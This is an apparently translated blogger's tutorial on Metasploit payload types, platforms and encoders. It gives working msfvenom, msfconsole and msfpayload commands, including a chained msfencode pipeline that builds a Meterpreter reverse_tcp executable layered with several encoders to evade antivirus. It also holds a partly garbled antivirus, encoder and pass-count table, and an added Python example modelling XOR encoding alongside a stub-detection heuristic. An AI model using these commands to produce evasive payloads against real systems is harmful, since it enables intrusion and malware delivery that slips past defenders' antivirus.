Mohamed Elsayed

ع ناصية | A web developer specialising in Blogger; here I share the essence of what I have learned.

Peace and God's mercy be upon you.
Followers of the site تقنى بلس (Taqni Plus) | welcome.


Today's lesson

Types and forms of the strongest payloads: what they are and where they come from


Their types





Inline (Non Staged)


  • A single payload containing the exploit and full shellcode for the selected task. Inline payloads are by design more stable than their counterparts because they contain everything all in one. However, some exploits won't support the resulting size of these payloads.

_____________________

Staged



  • Stager payloads work in conjunction with stage payloads in order to perform a specific task. A stager establishes a communication channel between the attacker and the victim and reads in a stage payload to execute on the remote host.

______________________

Meterpreter


  • Meterpreter, the short form of Meta-Interpreter, is an advanced, multi-faceted payload that operates via DLL injection. The Meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drive, making it very difficult to detect with conventional forensic techniques. Scripts and plugins can be loaded and unloaded dynamically as required, and Meterpreter development is very strong and constantly evolving.

____________________

PassiveX



  • PassiveX is a payload that can help in circumventing restrictive outbound firewalls. It does this by using an ActiveX control to create a hidden instance of Internet Explorer. Using the new ActiveX control, it communicates with the attacker via HTTP requests and responses.

____________________

NoNX


  • The NX (No eXecute) bit is a feature built into some CPUs to prevent code from executing in certain areas of memory. In Windows, NX is implemented as Data Execution Prevention (DEP). The Metasploit NoNX payloads are designed to circumvent DEP.

______________________

Ord


  • Ordinal payloads are Windows stager based payloads that have distinct advantages and disadvantages. The advantages being it works on every flavor and language of Windows dating back to Windows 9x without the explicit definition of a return address. They are also extremely tiny. However two very specific disadvantages make them not the default choice. The first being that it relies on the fact that ws2_32.dll is loaded in the process being exploited before exploitation. The second being that it's a bit less stable than the other stagers.

___________________

IPv6


  • The Metasploit IPv6 payloads, as the name indicates, are built to function over IPv6 networks.

___________________

Reflective DLL injection



  • Reflective DLL Injection is a technique whereby a stage payload is injected into a compromised host process running in memory, never touching the host hard drive. The VNC and Meterpreter payloads both make use of reflective DLL injection. You can read more about this from Stephen Fewer, the creator of the reflective DLL injection method.
________________


Their forms (by platform)

aix
bsd
bsdi
cmd
generic
java
linux
netware
osx
php
solaris
tty
windows

_________________


You can create them in many ways,

such as

Msfvenom

for example:

Code:
msfvenom -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3

Or
Msfconsole

for example:

Code:
msf payload(shell_bind_tcp) > generate
Code:
msf payload(shell_bind_tcp) > generate -b '\x00'
Code:
msf payload(shell_bind_tcp) > generate -b '\x00\x44\x67\x66\xfa\x01\xe0\x44\x67\xa1\xa2\xa3\x75\x4b'


Or

Msfpayload

for example:

Code:
msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 C
Bypassing also comes in types,

for example:

https 

http

________________

There are many ways to encode; first we start with encoding using Metasploit.

Encoders

Their types


cmd/generic_sh 
cmd/ifs
cmd/printf_php_mq
generic/none
mipsbe/longxor
mipsle/longxor
php/base64
ppc/longxor
ppc/longxor_tag
sparc/longxor_tag
x64/xor
x86/alpha_mixed
x86/alpha_upper
x86/avoid_underscore_tolower
x86/avoid_utf8_tolower
x86/call4_dword_xor
x86/context_cpuid
x86/context_stat
x86/context_time
x86/countdown
x86/fnstenv_mov
x86/jmp_call_additive
x86/nonalpha
x86/nonupper
x86/shikata_ga_nai
x86/single_static_bit
x86/unicode_mixed
x86/unicode_upper




_______________


They differ according to their strength and the type of payload to be encoded.


Encoding with encode

encode is not an encryption program;

it changes the values in the payload.

You need your own code (key).


I'll give you
an example:

Encoding passes, encoders and antivirus engines:

Antivirus    Encoder              Passes
AhnLab-V3    cmd/generic_sh       1
AntiVir      cmd/ifs
Antiy-AVL    cmd/printf_php_mq    10
Avast        generic/none         25
Avast7       mipsbe/longxor       100
AVG          mipsle/longxor

This is an old command I used for combining encoders.

For example:

Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /root/payload3.exe
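As an added illustration (not from the original post and not Metasploit's own code), the Python below models two points made above: what the `-b '\x00'` option in the msfvenom and `generate` commands does, and why "encode is not an encryption program". Every payload byte changes, but the decoder stub that must run first stays constant, so a defender's signature belongs on the stub (here its fnstenv GetPC sequence, which x86/shikata_ga_nai and x86/fnstenv_mov rely on) rather than on the raw payload bytes. All byte strings are constructed samples, not shellcode, and the stub layout is an assumption for illustration.

```python
# Added example (not part of the original post or of Metasploit): a toy XOR encoder
# with a bad-char check, and the static checks a defender can run over the result.
# All byte strings here are constructed samples, not real shellcode.

PAYLOAD = b"CONSTRUCTED-SAMPLE-PAYLOAD-BYTES"   # stand-in for the payload body

# A decoder stub must locate itself in memory; fnstenv [esp-0xc] (D9 74 24 F4) is the
# GetPC sequence x86/shikata_ga_nai and x86/fnstenv_mov use. The bytes around it are constructed.
FNSTENV_GETPC = b"\xd9\x74\x24\xf4"
DECODER_STUB = b"STUB:" + FNSTENV_GETPC + b":"


def xor_encode(data: bytes, key: int) -> bytes:
    """Single-byte XOR, the idea behind x64/xor: every byte changes, nothing is secret."""
    return bytes(b ^ key for b in data)


def bad_chars_present(data: bytes, badchars: bytes) -> set:
    """Which of the excluded bytes (the -b list) still occur in data."""
    return {b for b in badchars if b in data}


def pick_key(data: bytes, badchars: bytes) -> int:
    """First key whose output contains none of the bad chars (what an encoder searches for)."""
    for key in range(1, 256):
        if not bad_chars_present(xor_encode(data, key), badchars):
            return key
    raise ValueError("no single-byte key avoids every bad char")


def build_encoded(payload: bytes, badchars: bytes = b"\x00") -> tuple:
    """Stub followed by the encoded body: the layout an encoded payload has."""
    key = pick_key(payload, badchars)
    return key, DECODER_STUB + xor_encode(payload, key)


def scan(buffer: bytes) -> dict:
    """Two naive static checks: a signature on the raw payload bytes, and the GetPC heuristic."""
    hits = {}
    if PAYLOAD in buffer:
        hits["raw_payload_signature"] = buffer.index(PAYLOAD)
    if FNSTENV_GETPC in buffer:
        hits["fnstenv_getpc"] = buffer.index(FNSTENV_GETPC)
    return hits


if __name__ == "__main__":
    key, blob = build_encoded(PAYLOAD)
    print("key:", key, "| plain:", scan(PAYLOAD), "| encoded:", scan(blob))
```

Running it shows the raw-byte signature matching only the plain buffer, while the GetPC check still fires on the encoded one.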


You can also encode in other ways,
such as hex, reverse engineering, backdoors and shellcode, not only with Metasploit.



